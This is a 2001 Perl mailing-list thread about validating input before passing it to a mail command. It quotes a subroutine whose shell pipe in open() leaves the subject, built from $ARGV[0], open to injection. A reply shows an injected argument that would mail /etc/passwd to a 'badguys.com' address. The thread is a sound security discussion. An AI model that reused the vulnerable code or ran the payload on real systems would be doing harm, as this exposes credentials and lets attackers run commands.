Email Validator RE

The FAQchest faqchest at abac.com
Sat Nov 17 18:18:14 CST 2001


~sdpm~
Yes, true.

 ... this is why there is $MLISTAPPL and not simply "mail", as in my
case it's my own SMTP mailer.

as Chris, and you, points out: no IO must be done without controlling
all passed parameters.

I strongly recommend the reading of:

   http://www.phrack.org/show.php?p=55&a=7

Luckily, this document that has been out there for quite a while can
still be found.

I wish you good reading.
Thierry


Eugene Tsyrklevich wrote:
> 
> ~sdpm~
> and how about
> $ARGV[0] = "oops\" dev\@null.com; mail /etc/passwd me\@badguys.com;\"";
> 
> On Fri, Nov 16, 2001 at 11:11:39PM -0800, The FAQchest wrote:
> > Ken, here is an excerpt of a script doing at one time some mail notification.
> >
> > I've adopted a paranoid approach each time I have to deal with system or
> > apps call using an open () command. I enclose the whole routine in an
> > eval{}. If the mail server (MTA) has whatsoever troubles (most of the
> > time network/DNS) and crahes, the calling script doesn't die, just the eval.
> >
> > In more secured scripts, I use an alarm signal to include some timeout
> > control on this IO.
> >
> > You see there are a certain numer of regexp to make sure tha e-mail
> > addresses are ok.
> >
> > Thierry
> >
> >
> >
> > sub clearspaces {
> >   return (0) unless (my ($instr) = @_);
> >   $instr =~ s,^[ \t\f]+,,;
> >   $instr =~ s,[ \t\f\r]+\n$,,;
> >   $instr =~ s,[ \t\f]+, ,g;
> >   return $instr;
> > }
> >
> > sub mail_notification {
> >   print "Trying to mail the commit message ...\n";
> >   return (0) unless (my @text = @_);
> >
> >   my $emregexp = '([\w-_.]+)@(([\w-_]+[.])+[a-zA-Z]+[ ,]?)';
> >   my $subject = &clearspaces ("cvs commit: $ARGV[0]");
> >   my $mailto = &clearspaces ($MAIL_TO);
> >   $mailto =~ s/[\s]+/,/g;
> >   $mailto =~ s,\\,,g;
> >   $mailto =~ tr/A-Z/a-z/;
> >   return (0) unless ($mailto =~ /^($emregexp)+$/);
> >   print " ... Done mailing the message ...\n";
> >
> >   eval {  # don't let the main apps crashing on this IO
> >     open (MAIL, "| $MLISTAPPL -s \"$subject\" $mailto") || return (0);
> >     print (MAIL join("\n", @text));
> >     close (MAIL);
> >   }
> > }
~sdpm~

The posting address is: san-diego-pm-list at hfb.pm.org

List requests should be sent to: majordomo at hfb.pm.org

If you ever want to remove yourself from this mailing list,
you can send mail to <majordomo at happyfunball.pm.org> with the following
command in the body of your email message:

    unsubscribe san-diego-pm-list

If you ever need to get in contact with the owner of the list,
(if you have trouble unsubscribing, or have questions about the
list itself) send email to <owner-san-diego-pm-list at happyfunball.pm.org> .
This is the general rule for most mailing lists when you need
to contact a human.




More information about the San-Diego-pm mailing list